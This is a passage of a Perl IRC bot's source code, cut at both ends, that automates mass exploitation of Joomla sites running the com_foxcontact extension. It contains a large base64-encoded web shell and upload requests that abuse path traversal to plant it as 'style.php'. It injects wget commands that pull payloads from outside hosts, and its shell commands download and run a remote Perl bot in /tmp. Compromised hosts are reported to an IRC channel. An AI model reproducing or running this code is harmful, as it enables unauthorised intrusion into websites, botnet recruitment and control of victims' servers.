NZVkg3cmk1UTljbElvWXVWM1REZzhsaHlnYXJCblFDSFZsUDlkdlgvbGpwVEw3TjFyaFhSVW05Z0NSTTJlUmxYVWtBUkdWVk9VS2N1cEdvVkc5dENLTU1FTDBub1c2QS9aZ1MzbGRIUVpQckxFV3AySTNrSE5EeGZTZFA1NHRxanM5RzFZL3UwYzR3cmNkaW9QOGE4VEJ5VEFaNkp3MHpwTElyUTlrL0JEa29OOGN4RW9jblRGRXl4N0N4Q1NVL2NIS3RoS0RBMHc1N3dkcGd1SGY3bHByZ2paOVRwSHhSeHk1ZjZPMzc4VnBBVnZsbi94a0hZVzNoRHRvYjZnVXoxNjVKUmE4cUVoUS80UUxBOFZaWDdteXVNL1BoZ3hMU1lzTjJlck5vN01YNTFWbDVaWHJFYkJVcDdmTzJPMjVsWXVvYkIxdndadDB1YlFrVVRaN3dpbHkyM2M5OUdjOVQwZHA3MHBmZ3ZwZUErcGVGbW53TjlRZWx1RDR5TXhZdU5GNWtkYzM1QTBwbExXMHpIM0hERnlUekJaUnhONGN1RTdjOUJGVHpLYUpBNldVaVlYd05CWWkwK3hMMUp0ODc5VnZpQ0V3dEZod3c3ZFZsUGRsMUU1bThSVmRZdDRFbU5aamx1MktuRzR2VmVTZWlXZWVzYzVmdHpaZjdlNmJ0SGh4Y2wwMDFWRG1xUHFSRnBZenpxM1FEb01OSzF3ZVBIQTRCUStackI5cVc2YTVKeTIwWG56aFpTdzZIV3NPNWpVd050ck9HaFB2M0VQVVVPZW9aOXE0OWNZYWg4TE5iTUFJYmNxSW9tbkd3RnN4UXQvUngzdkROeXBUVEpVYm94dWRqVER3c0J0V3R6aE9LNDdWbXlNUE1rcytLRUlXWmt3SGpPWnk0SXN2VHVnVnptZGxDVEFiaGhMQklHQWt2QWJTZHc1bTNISktOdzl5d2U4eFd6N0dHV1E0cFZ0WGJ5aGIxYVFjYUxPYVBrZzF2Ni9uVXlBYks0QW5PdjhmQURvVFlYMjVOcGhBMnVNQXNBVEsreUpHdFArQlUxbE5MRExmWll1RVhNU3RwVC85THRHVTI1ejd6dmlSN0tGY3FJRXlad1VrVUVNMXJ3ekl6Q1YxK05rdWFLc0JDQi9SQUV4Y0hFZmVtUkc0OVpIMnlkOHNQR1NYbGF5aW5NYytCajEyOWlGWDhRMExEdzczdUNubmN0ejhTU2dka3h1OXBIakNFdHl6Zm9iRXdlMUhBcWlOdmN0WXhQYXU3MjR4MkF2bjFVMHhNaWtZT21hQnRtVHZhd1hIcHovb3daOTJEUEIyNzViOGhmbUZ3RGlIQWlZZW1hMWp6RHN5SEt0ckNEZFEvY1BoKzN3TzRWNkVWaURwMGs0dmtmTGFPWmtPcTA5T1VoYVNleGl2UEF4VjNVczJ6cXl2R2lERHFuZ3Q1K3ZINnhVNXNCa0ZjMVF2NUQ5UkdGbjZEajNOTTJwdmozamdNNVMwbG5YMGhwVDV2MEdxNUw3MlpwaHI4VHJRNXBISW1hOU1zaytoV1kvYmJXRXBKWmhaakJodjV1cDdLUE5CT2FWYjJzSFhSVld4eTI2bUhrM2ptY05ZSHRVMjVadWNNa2M2MjZKV29aQmhDMkFiM3RicGtpUnA5bGpsblZGa2YzMFg5MkJQNHlGbzZGNCtaTStNaEpFbGZ0Uy9TelFBQTBHK3p5NU5Ec0prNXAvRFU1K3ZXby9ZMUZRV2xiOVRVcUdORDI3aTVKWHNXa1NLSzIrNWFHTVBFRVd3R1dXa21RdXliTDVHUm85WXFWL3JHcURhZkdLVEVVQVRtU041TURQTUpTVGNhdm1rVGEyck41cnFWY1F0d1BkQ2Y5eTNUOUpHOUhHblFxWmhzRk1JMkFCSDJoSlJZUCtRc0w3S2JNY0Z5b1prYW9UNTRTL1dBMEV5QitWYzBUZ1JyNTZXQm56SHBUOHhiZDd3dDA4V2pta2ZsVU9DQmxmcXlTbzdzRE1GMHYrVGdHSTI3YWx2WGxXKzNvUWJYN0ptWitIYngyY1VlMjRIVFBDS1RQVHBoUzFPTnlJQ3BsdGZ0bW1hQ0o3ei9aYzV4aDJkaGM2aWZ1SjVrM0N2VzUrWGJlQ2w2bG5oQUY4UnkxUTZaK0hDQllPQThmVXdjV0RERVZUcU9la1R6cGgwRFNyeWZtVjFsbkhrKzVRTDlnS1hybUg0bktEdUl6dE8wdW81Ym1QSGJZOXR0VkdaVFZLNWx4NlpvTU9NcHlhOG5OYyt4d041NXBRUXVwWUV5RjZVbXBQMk1yd3JLRnFXd0xWY0hCRGVtUFF2UEdmZXJlM2RkQ1gvU3pGYThsK0pyaEZUVDhEZjdYemlkRWZFdE9yZzkxRnoxOHdXdWZFTHZnTTQ0OWNnZm1JRzI3TDhYaitBSC81bEFRSEFOQ29JMFVPTVN2Q3JNcXJzQms4MTVIcVptUmg0V05xbDlIUXk0V1ZXOUZnUlhDQWEzUmhKY1dhY2F2U3ZNYWJwOE9GMDIwd2VMZmsySWptaEk0bWRXcTdLdElFVjhWc3FYV3Z1RmZ6VkJaeFhnWjlwUFkwY2JrTGtNdkpjd3YyUFRZU29MSzJ1SERJYWw4ZHJrYTY3TEQ4K0hXQWFidlVjZk5IZmxhc01aZm56VThMbGcyOFJLTGxXZit0alZHcG9QaVVMZTI1Z0w5Vkh2WmY5WVBvOFg4YVZhYlllbXY3OWtFSGpJOVRvUkNYNGZCUHhybkhNVFUwMEgzSnc1akNHNTNEQ1RLZlZ5SVdFcXdQS0RJMDhaMEhCamk3cGhuT0ZhREhhUDR2WUx5S2QrTWVrS2JXUUpscFIzTUlkb0RoWi9NT2MwQ0tQejcrUERYUndvdkZsK2Rwb01DZGwveG5kS2JQV0p4amdsS0wxbEQrQ2I1dE9LUG9UZWZhYmh2Q0FtMnFZRlcvblpsZkRDVGJYcS9HcGg5SGRCdkF6bWdkRlhnMlBYWXpTTWhVbGxDK1I2MjZQRFhkaUFTcXBNUDlUM3hLYS90UmFaS2RhZmZERDBEN2JGc1BCdk0wVXZYMzZUVUlmVG5YNXR0SUlqdm4zazRQQVJMVzZscTlNUHdnZU5ocnJXL0xVU0dwY21SQ25pZEpSWmJXMjN3c0JLWlNpRjBPNTBlYWRWMUJQb3JRZzVSSGVDb2xQcGhOVjE2eEtFSkVDT3pWWFVwNTlXUENsRVBJamF3ODlMRlZXaWFWb0NrMGpkZjNIOElKRXdZcnpRZThxMmZGS2hYUjNHdU54dkEzbHk1UjRSN0FCazF5aTUxMndIME9pZDc4ZTU5UEVseG1hRmtaQlB6aVNHdlpTOW5xenFlQUg2Y20xeW1tUk5TM2pwSldxN0V4NTNPY3huVVVtSUQzRVMrbG1qK0dVRWdPb0s2YURkWENNVStVbG84dWJ2aDk4RHJwUDFISHg2K3ZQOUhJZk1EeVBXTjg0TTB0dyszQVJGb3JaSG11Y0l6bTdYQkU0OGJpMmp5ZEFaQTl3WUx2dTlGRkhZZkQrYlllQVhkcFpHamUxRjQxTUw5QUl5KzdQeWFxWForQ0JyMmNKQ3lhZ1l3OFpWb2kvVzdVNWt4VHBwSXdhb0x2WHM5R3FnOGNGRlpHRDlkb2p3TjIxWUh5YUZTbDNyZ2RBN0t6K1pjK0NnZXhDMjRicDFqTG1vcldyb2FFem1OT2trSDJSdkFjRUk0OW5VTEt2Yis5dG10ZzFLNVlaTUdLaXpCWjd2dytwUWhJcmpPQU10aHFxaTdydmFvaFF6eHE3OEx4M2Y4d0ZZT0FvaDhZNzdjZDlncHc2WTlFKzh0R0x3YkdBZ0RjajdRbis2UVdTOHVJdWtuOUlBdTljV01Bb1l6eHlNREVKOFVwaVFVVi83aFBCajNvMzNza0xFdFBsenFPZEU0MEFjUW1wNDJWVmNzc1pETHg2cUFpUEd5WVFyUFdrMm9IRmlzUjJVM1IzeUZBOGt6bmg0NldkTGdNdGVGTTB1cEVCMmRiWnJQeldRL1pjclJEVjQ1QnQxYWsyUzUrWkw0cU15Kzl3a0ZDNFNzVllVb3poZkRyanRnQU1YeWNZZklWd2JYSlZKdFJ5ODUwUlorQkVsVlN0YjlUeWpqYXJSM1lQRzVXdDhPSlVUNVRZQ1pnYkVtUkQ5UndIdWtiVUFYbmFyNWhIV0dZSHozQ0VkaTV2OG9iSFVTaVlhWnVib3pETCtCc0NRaDA5RGowVHNVWkhEbXFHUk12N3IyVHdnMlkrQTBKM1VPY2ZZNWZKcmhPZjFyWmVwWjFLcDVGMVE4VTB1bkU1NjRGdnZBUXlhVkNwbEtrWHB1cGZMdGFBVUt6ZS9mK050S01mK1ovM0hJa1JNRTlVUEk0MTcrWnF6cU1VWnQwOGFndkVYVTB6cEMydldFcjBESUJFd0ZLQ3Vsekg3b0dGbyszWDNCdGtJYXM2NmRJV2ZZMGE0aGlsWjdBc3RuQkE5T0tNWjVxekJxdjJVbm9nUUxJYzBNNDUreVhYKzNLeFd0QmdadjkydUo1a2tOeno2VUlwakNZbFNyMDIyNVc5VG9kc2lmUlVzYTA5U0tjR3pKSWxRdnhyekJsZ2hhbVhJeVdSZ0RkRFRyUGF2ckpJb2UrcHAxYXYycUhGaTZ5WTcxcmVYMUNmUnEzaVdxd0F3TW1OaFJjcVVBdmRZQS9xRnlpRGJEVDc4QnI1ZlJMZGhCVWczZXVJMGNVWW03SzRjY0RLNUd0SDF3emNMVkpLNDJLdC9GUm9yQzJLU3E0bXREcFVESFVNelUxWlN5WnJtRnAwUzZNOEw2RkJXRlpzSmxRakZKR29nUm0rQk1mMlpFdlk0eGlQQUIvSkV2YlQrQkJRcHk2MytoakZpU2p5OE01NExxVGF6LzhrbExheTkxZVgyUmxRdkJtbDVnVVlrMWhWd0tmbHBLaTM3dCs2MlBzU3AvVVpINDlDdVVlK0hxdzVjdklHZVN1ZFM3NmkwMHQrdEkxL2dkS21RcGs3UXNFS2RiMSsvQjgrOXFEOTI5bS9RbG1LeVFwYS8xQ2wzUWhHNzBDaDQvNzNPK3dzRk50T1M5S3pFOW04Nzd6ZzV3OWdnRzhDVUkzazFLM21GNS9EMzFkaU9zajNwRExWL09pdFM2L1U2c3F3NmhZL1huOWVxNXMvZXEwNGxyazJzcy93K1NvZThHazgvL2U1Ly9BOVBZYnMwL1UyVnp1My9ZaTRZYkNQOFV3KzllbSsvWjkvZC8yMGtlRGVYdWdQckhtLy9OdXorN01sL1kvY2ljWkIvL215NDgvMGovL2RneS9zQ0ZxazQrNzQvL29KL00xaGcvN1lrWXRVQjNWbjg3MzdQL280OGkzcm1ZRnUyanJxTEZjc2k4NDIrM0h0bXFpNHEvYVJrMS9pQzcvVms4aVVzMEVySS8ra2VvQ285MWlnLzRTdHRjQWxSLzU5bzlSL0s4ejcyK20wSyttcTdhL1dpU2ZnL2M0YS9yZW9oSDVHbVEvL0wxL0Q0MHMrR2lKbzhvLzErYWYveEQvL0NBKy9nKzRrZVU0TW8yc2kzSi84czg3bWUzc3FRNXlpc0dwYkNUOCsvMHNhLytUczllczNDMHBDMDlzOTkzejhLOEVpRFVsQ0RJbjlvRE5Lc3kvNkpZTDkvYTc2NGFkdmcrczI0M2lCdnNwYTk4ditCcTg2NmVrMTc4RzM4L211N0M1MS9QRnBONTdkNnBDOHMxUFZDQS84Mi85K3cvL21pL2V0c3NoLys5bklDMy8vWWgyR21HLzhJbW0vc0tpdzZ5eitlUy91cSttOG8rUzFMNGUrcTFnNWc3L1U1Ny9zaUdoVC9Ia0NsQjZlL0JlRDk0NGlHOS9uTncyTzQzalUzVDA5ZFkvUzRzNGU5SzcvaUFwMysvL1k1LzMrbi9TOTc3VWtVNHlDQ00vL3QrYnN4clJKL2J5c3FIVTkxLzZtUmg5L2FCQ3NPdDM2Ri9ZSy9vQisrbTJuQzBCOCsvRS8rdWUvcG1vcWVvNjNzc3E3OFFRUSs5eDFlNjRUK1NkOWgyai9DdUFCQ2piM1Fkd25UKzczMzQvL0tuN3NhRkNSa2JzKy9TMExpK1FydDczdW9xTEsrR1g1L3M1OS8vNGx3Ly9VQ0FDLytVazQ4M091L3l0L3dUNy8vaGRCNGlsdS9uTk82TThUYTE0eWkraTNKLy9HNTcvc0NTaS9zOHV3VnB5ZSt2bVYzVVVRLy85NmQzQXMvQm80aTVyMy91WTBDQ0MvWXFmLy85OGo4L2d0bU80T2lvQU5nLzM4NkZabXJmcThDZ2kzdjgzVWZzbTk3KzArYkdiL0xUaS9URk0vK2g0eUE5R0ErSjcrY21zOXNOWkNqNXppTHpkMHNOaEJUOGIxNzNzZzArL2ozOFlSZi8vYWQ0S2VlY0JDL3Yzc0MrRmVlOW0zZXNNMDFBMTg5K2lIbXM3R3FHbUI0LzYzb3ovL0w4LzQrLzNrMysvVW03Q0IvMS9DM2tDLy8vTDZqKzJjOGVmd3N6cjcvK0RSL3MvWXhycE0vLzV1OWEzSC8vamdnRy8vVWRueXJoU0pSOHNMQXJiLzYreEJjOS9tUW01c21UZS9CZ2h2TSs3OC83NDY1bzdDVnkvczdkNmtpSXN3cmc2ZTV3Mi9PQTg4R1pOcjIvcStnOUsycTFiLytxOHNmN0tsK1U3aG9qc3NlK0NKcUFXLzkxYi9CTCsvQ0QyL0MvbzcxL3N3MS8vYStnNXczL2FPVUtybUt5MXFzc3Ivaks5bW0zL21nbS8vc0JDKysvQW83Vi8vWVBKOVh2aUw5RlVlc3A5ZTl2aS8rNWl5VDQ1ZC93ZTNTczUxaHZJOGxLaDlldWV5ODA1OE1vSjJrQUM1RTFZa01FR1hUODB6eTRzZmE3bVVnNUNGcjlHeHdzQkVmYWZDL25iQnNTZkdSQzJydnNyQjV5eEtZbVVpK1IvRW1tNEsvODVaU28yQytnRTl2Q1dMcDRSK1FGWjlxN0kvUTRXN2laM0tVL3V6b0xUVlh1bXkyMUpIRjJnc1JDcWEvNlpYM2ErajhxN2hEUTNxZGtjWCtPZ0MrMU8xRUU2S2wyLzJrZFcveFlWQ2wzaXZJK0tob0JoNlpKOW43MnRLL0tvOXN2ejkxT0V6QmpwKzlTaS8vc3UrMldTNDMvenFxck5UOWdvL3YwamtmaHhBZjhCcnk0YW9haE1UYXBlMGlhR1JTSkI5ZGoxZWJwOWNrL3gzaDFXdnE3WTcwc0VIbnhiOVhhSHNtcTJTYTFla2w2OXl1emNNMmFDcVVCWXIzaWI5M2lKWDZTYTBzL0RubFdSUE1KN0MrYzhkaTIzcytkK1NsZTUvcWdaMThmekIxWkJLK0RuK2x6L24xWS8vZzE4VVJ5L0x0c2R6Szc1YWlqQkw3M3pQVWZpb2NSUDVjdjYrL1VxSWh5TXgvcXMvZ2ZROSsvNWovMzNzK1dwbUwycC9LaXM4M0JnZjhUMjlXeVdGejY4emhCWm5vS2lJb28rNTIxMm9yK2s2ODVKS1UrRVcrdkxrNG81bXNzSUs5ZWhLOTE5MGVzaUR3dWlZVnFzcG9pazA4QTZkS3JXa205MGc5K2djenkvenhldWluVUthM2lYbm8vTWY0OS9memlmNi96Zi9uNVpFMzZwa1NrM25RcWd1V1lvb25nK3ZpMHBlcTBhS0k3TCt5Ry9tSnFoc2lzNndVcjRrS2FzOGwrTVVNaUE2SWxIMUxTRnowUEtvaTR2L2RjOHc3NCtvb3owcWNOY0VXczNMaGVvMmx3cnpqbkM4OTZGM3M5azQ0NUJBY3FzS2NtYUwrWXMvTTF0VFZDOGQrOW8xNnFTOGhNa0RBT3E4dm1tNjRrWmI3b3M4TVVxdEhPb293Z3dMcHp3WG93d0M5aXUrSnZ2NFgvOW9YejhqellCOTRabkM3T28vd0MvNW96ZWljeEtzQmxhNXBIaXMvN1VoREpmTWlIK1VpYTVKM3lzTUYxOVE4SmMrcTlYSUh2aUo5NzlVcDBDaTBUa05IbytLRTczS3FnWTNueUFDRkY5UzM1NTM5aElsc0hCZzg3RlhEVTN6NTcxV012NWlDM3lpL2pvaXpvKzNpcy95bWlHZS9ndGZ6bGxjQ2k4dHp2cXJqMXJlK0U2bGxhL0gzaGcrczR4Sy84d2VjdnJmNVdRVUZ2aWhWUzljZjBvaStWNlUyOTlnSTlKWi9NcHFzVDBuYy9Ucmdhci8zQjZDc1diNjVhbmpNaGtRQ3dnaG14K2xsN0s0OWkvSThLa3NmU2JMZVdCR1prendYUFZEU2lwM3hmR29vL0V5THIrVDMyb0xmWWVFWGpvKyt4WmM5MjN4WS9pcDcrY2R6UytvbGRsWWN2OWw2MjdpVnhtOW93WTM3SStrRVFrVnMxZ1htZzE3WlVHcnhBN3ExeUM5YnpBcDQ2ajR1cURseGlhY2hhdmg4Q1creWo1UmNOczljaVVwWWNzL3lneDhkLysyNloya2tvb2krK1lEZjdaVU1JSXJpQTMybnRNRVVyZWNCTy82SzRrN05kc29kLzE3L3BzMDM2aXcrTmlMM3pjOVVXQ2l2TTU3cTRpVG9Kd3crY3dxZ3FDMS8wRTE4S2hzKzZocy9sUWQzKzV3TWxhcDU4bzYyY3NSYTJLdGkrMmNpMmhpYWdZL0t4ZXJBaDllZWg3WjNMeWpHZVJtNC95d214MmtibCtERis5SDdmRUk2Zmo4MGdGbEE3SVk4RmdyOTgrVHdZSENGbmcxaDFpTWh4S0JaeTNobGNtWFU4NkNzN1lBb2k3Mi9KR0l3OHV3L2x2SVlxaHNKSytHOFBteXJQMXE5NzhVdFdrS3ovRmhNNzVpcjBZTDMzbGc2SngyNElLLy95NWZCcWJML2lobzd3KzVyeS8rS3F3dktNN3NGc2NBdVhUTmJDdms5bSszMTVzVGlmcmg3aTB1Mmk4SUIyeCsyNTJVRk1KVmUxYUNydTFnOUNncmxhaU8vK0ozcXpKL080aTlxcVptSGZSK3ppcEVURFk3SS9xdytXR1ZpczRVYUh6K2dmOGVHWVdkdC9lWTM4M0I2bnM1YWllZHFiNGRXTXJ4RzIvb3RFSWtRajQrZHJwaEZRZTV3VXYyWWVnUjMrT0NjeXY2MkFIc0hyamVpVTFMM0crcDA1Z0dFYjVEY3N6SHYrcEs2Q3VMQjkxeTZ3WTNmOEV3YVVVOXNnOWVBd2hyKzlzYmVlRllxZnR0eUJoNDI4VnNuSGkvSGpLWjdoSUJLTjlqaXNOK25aM01KcVEzQ1o3eFlpdE9wM3dzczE1MzU0N1YyQS9lMjFNeHFhVTZDM0FQQzlPVXBFK2xQQnNLZnowcUtzN2JCSm84N0t3eGVVaXBQdjNnNTdvVTM0b1R5OHp2WXJMRmFpWmFwTG1JUWhWc1NsVm8rMjBtdG53SEN0YVpZdjRtNy91UVp5SWtVWUgvbERLNVMwNU9xN3orOW1xTTk3bjNQLzVpbUFOYjQyV1NjL3Npby9jOVoybWw2YU5ud0E1bk9Zc1psS3ZzeHNIajN1d3NEMW9UazNaZHFzbHFMcGg3NXAycHNJcmhlVXN6Ynlzd000LzRaVlYvQnVKcmFZTi9JQWRvYyszM3ZlODRHSlNxNk52dXNNTktxQkhKWkUzcEJDY3dza0kwd3A5bWNtU1lwakxwVTMvOTBreGtNSisycS81ZXBiOEg0Ky9CZldLcnVkQ1FXSnNFODIxK0E1YTNzRzYvOWNDcUZkK1lpbW4vNTkvTnFPOXBTa2F5MktUV0lpMjNCSy9ZaWgvNkdRMzNvMndtRkthc2ZHMVNDc1hPSWYxWXNxcGMvRTlCeTRLRkN4MVFkTUkrNTVZTDRIaU84UitLaUI5aiswSWpCTjJNbWU0MzlqOWhaaFVxZitnOS84cWc4Ni9UYjNnaXBXZVlyRGlPNTZhN01LWCtnaHNhd2xlSWo1QUtFaXhUUDlCSzZCa1dFRzlEaVdRcytoNWtYQ0Z4M05pL2g5aHordE9pNmdxRzM5Uy9QaEs1ZUsvUXIrbUtZK2dLTGZiK1ljc2VTN0NlRzZHTUJsOGgyV3pvOFptcSsvakNDQ3ZZK0ZRVzYvZzdNWDVHYTA1OFdtK1lnZi8weTdtQVVLZ3ZHbFJGYzlLWHFrN2lIY2FXSy9CL3BZb3NDNmxJeTNpL0Z4NzJIN0V2QXc1N0o5bCtnaU1kVE5hczlRTWEyQTFQK2tBZVQ2RWlFczRsczdXN3AvSE9FVGlQblYyd0NvMGlVZUJDWkE0NlZIZDlXb0VUK3IycysrSGxLcy82VnFwRWg4TVd1cGhDb2Q4bGtmUTg3aHNLL1kzZUdhT3NBd0lKY29hSXpiM2tVc2prc2c3QWNXWVo5OUdzZXBvOWlIaVlsd2d3NXBGd2pMMmJzM0wwNWEyM3NjZ2ttSzM5VUVQM0c2OEt1UXJqaThna3dVcGhhMy85WVljcFdvaUt3TGtGeGtDYTd2VXFQejkzQjVIc2ZIZkRzZys3UmlFMitncjlKK3Yvc1BranozWW4zaWJrOHYzKzBqVEIwaXN6b0owQ0MyWDdvam0rOFArbndyZnJnN0lFenI2bWdGbTdzTThLZW1nYXFVMnMwOTl2MDVSSTloQTZZNmd0RTlLVEh5VHFFS01DUy9pZ3FlczdTZ3NwSzgxNTJic0NsM2l4RnNZZ2doNVhhYTlBc0c4My9nOFMzKzZyNHVrc3I0M3M3UDdTcU8vOEorbVUwL0ZzVTlzNko4Q0I2SzhDbW0vUjY3aU8vNzMzeE4wM2cyMzEwVXlOLzExQ1B4ck45L3NMZis3Uy84Ti8zODl1ZkoyKzJ3Ly8wSHAvdVdqQ0NUQjlYYmhiK20yaUpXaGxyUlpNUUtBWllpbm1OK21LcS90Q1ErMW02NzNhR2UvQ2lBKyswZzk1Q1kxL3NIN2RWbC9DMyt6ZGRkTHo1Mi91ZWtaMVM3NDN5R0tDLy9xM20rcThpKzlrcWg5ei83Y2llR0FvVFJpMy9pOGhJYWlqTE1yQmlLaXFJNmVMeHhtaDlxbkNldS9qZlozcmYvYVM5dWlyWFcvNDk3cy8vZEVDNU1LK29PNlVjZ3E5czV6YWh6L3RnUjl3M3NCejEzV0dvZHJTSmZMZmEvVjh6aThJTXVWSGdnNzdCakdUQWNvejdXWFVVMmdRcUFrMXk5L2diTWYzWHIwOWtlL0J4ZTVQZTRyRXhwaFArMkE4M2kwRnMva2RNc3g1cFpYSDlMLzhQTGRza2hNNEg0VW93L213allzY2hzYmk4TnFJaWxWUmVDcjlmbVUzK2ZaNGxwOFk3QnAvVThuSjdvLy84SS9jbG8zM2FUKy9EMEIvMnNlK0tzbTkvOUQ4bzZrc2k1NmN6bDlDYVFpL3MvRCsrL280K2E0MEQrNzBzVjJrYzU5SWYvaW1vMlVJSkhtdS9VN29VVXEvdCs3MC96cVVGL0VqVC9jK2UyU3M3QktaUVIwZURncDZENS9zOTdRT3RpVC8vOSs1MmI5bGwvLzNDMS9ad2svM3E3Q25mZ0c5L2ovNWkrd3o2OS93UUJhdGc2ZlVjUS9HUS9sL21zbzQ3MjFGUzJLbkNncy9UK3k4Sy82N25qanpzZ3E3NC9pa25uVGdidU82aXRtbjdSS0xDQzgvcytYbi8vbUdRLy9hNjNTSysveDEvOE0rVCtaQmVjL1NueUMvL01xcDlNbWsvSy9Sd1VzUTIrb21MUVFoNzg2ZDNoaHpSeGE1bC8vL29RaS92VS8vc0hDOURxaGxvWGE1OFEzOTZlL2tzVzFXZytndFN6N0NObzdBKzNuOWMrNzk5Lzk4MktzOWgveUdxR0lLcDlNYlcwQ2Y1R0IrSytDeHM3NzZyNmNyZWVoNnIvOTIrLzVjMy8zVTgvMEtRN2lkaXgrc1VoK1FpNzhOeS9DQjVBLy9DWnBJQTRyaWtpMWJqL3A5NityM3VxTS8vOEplZDFKWDRZMjFoNFdnYVFCL2F0WGkrdi8vTXdrS2MvUm1hVitKZi9DZzhMQytLOS9DeXpGNGkwQzl4ekcrL0crK1JycjlhUC95RU1pL2k1aC9sODM3Y2VzTGlyTUk4MCs4M3M3OC85VCsvYXIvL3BBLy9ib1l2ZDhVQy9pai9FMzAxS3Yvc0NoKzZxN29yK1UrKy81OW1DNzRrUS84YWxTaTZxOVkxaTgxaXo2aTdkL3NuOG1jc2xnK2liLytxWHcvcjJkbTRaKzNmSi9lNXZleHJvck1uMjBlSUtxSUdLSTE4NHBrczNxL2dPT3hXdmp0T0JqZk5CemdjUS9Td1VWS3hOUDROZ2hYZGVyVEVwdUFteTlMcGxobGxXS1gxM20vV0xoeVZpNng3MUNlJykpKSkpOw=="; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."./style.php.ndsfx",['style.php.ndsfx'=> $code => 'application/octet-stream'],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub shellx() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; #$path = $1; my $crota = "http://".$site."style.php"; my $crotb = "http://".$site."style.php.ndsfx"; my $html1 = &get_content($crota); &kcf_post("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.php);'); my $html2 = &get_content($crotb); &kcf_post("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.php.ndsfx);'); if ($html1 =~ /GIF89a/) { &get_content($crota); my ($safe,$os); if ($html1 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html1 =~ /Uname : (.*?)<\/b>/){$os=$1;} &msg("$channel","![7$engine]! [ 8SheLL 2Target Sent to 12$nick 9$safe $os ]"); &msg("$admin","15$engine3 [Success]9 $crota 15(OS=$os) "); sleep(2); } if ($html2 =~ /GIF89a/) { &get_content($crotb); my ($safe,$os); if ($html2 =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;} if ($html2 =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;} if ($html2 =~ m/OS : (.*?)<br>/) {$os = $1;} &msg("$admin","15$engine9 $crotb 15(OS=$os) "); sleep(2); &msg("$channel","![7$engine]! [ 4SheLL 7Target Sent to 4$nick 9$safe $os ]"); } } sub fox_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$privlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $cek = &get_content("http://".$site); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cid; if ($cek =~ /com_foxcontact(.*)=(\d+)/){ $cid=$2; } my @bugs = ("components/com_foxcontact/lib/file-uploader.php?cid=$cid&mid=$cid&qqfile=/../../style.php", "components/com_foxcontact/helpers/qqfileuploader.php?cid=$cid&mid=$cid&qqfile=/../../style.php", "index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=$cid?cid=$cid&mid=$cid&qqfile=/../../style.php", "index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=$cid&cid=$cid&mid=$cid&owner=module&id=$cid&qqfile=/../../style.php", "components/com_foxcontact/lib/uploader.php?cid=$cid&mid=$cid&qqfile=/../../style.php" ); my $bugg = $bugs[rand(scalar(@bugs))]; my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $agent->timeout(10); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101Firefox/14.0.1'); my $url = "$site/$bugg"; my $data = "style.php"; my $res = $agent->post($url, Content_Type => 'multipart/form-data', content => [ ["$data"] ]); my $hasil = $res->content; &post3("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.php);'); if ($hasil =~ /{\"success/) { #&msg("$chanxxx","![6$X]! [ 0".$site." .. ]"); sleep(2); my $shell = "http://".$site."/components/com_foxcontact/style.php"; my $shell2 = "http://".$site."/wpa.php"; my $check = &get_content($shell."?220"); if ($check =~ /GIF89a/) { &get_content($shell."?220"); my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$foxlogo15[0$engine15] [0SheLL15]4 $shell 15[9$os15] [9$safe15] "); &msg("$channel","![7$engine]! [ 12sHeLL ^_^ 2 $safe $os $uid ]"); } my $get2 = &get_content($shell2); if ($get2 =~ /GIF89a/i){ &get_content($shell2); my $safe = ""; my $os = ""; my $uid = ""; if ($get2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$foxlogo15[0$engine15] [0SheLL15]4 $shell2 15[9$os15] [9$safe15] "); &msg("$channel","![7$engine]! [ 12sHeLL ^_^ 2 $safe $os $uid ]"); } } } &shellx2($chan,$site,$engine,$nick,$logo); } exit; } } } sub shellx2() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; my $crota = "http://".$site."/components/com_foxcontact/style.php"; my $crotb = "http://".$site."/components/com_foxcontact/style.php"; &post3("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.php);'); my $html = &get_content($crota."?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/docx.txt%20;%20perl%20docx.txt%20;%20rm%20-rf%20doc*"); my $html2 = &get_content($crotb."?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/docx.txt%20;%20perl%20docx.txt%20;%20rm%20-rf%20doc*"); if ($html =~ /GIF89a/) { &get_content($crota); sleep(3); my $safe = ""; my $os = ""; my $uid = ""; if ($html =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [ 8SheLL 2Target Sent to 12$nick 9$safe $os ]"); &msg("$admin","$vdlogo 15$engine3 [Success]9 $crota 15(OS=$os) $uid "); sleep(2); } if ($html2 =~ /GIF89a/) { &get_content($crotb); my $safe = ""; my $os = ""; my $uid = 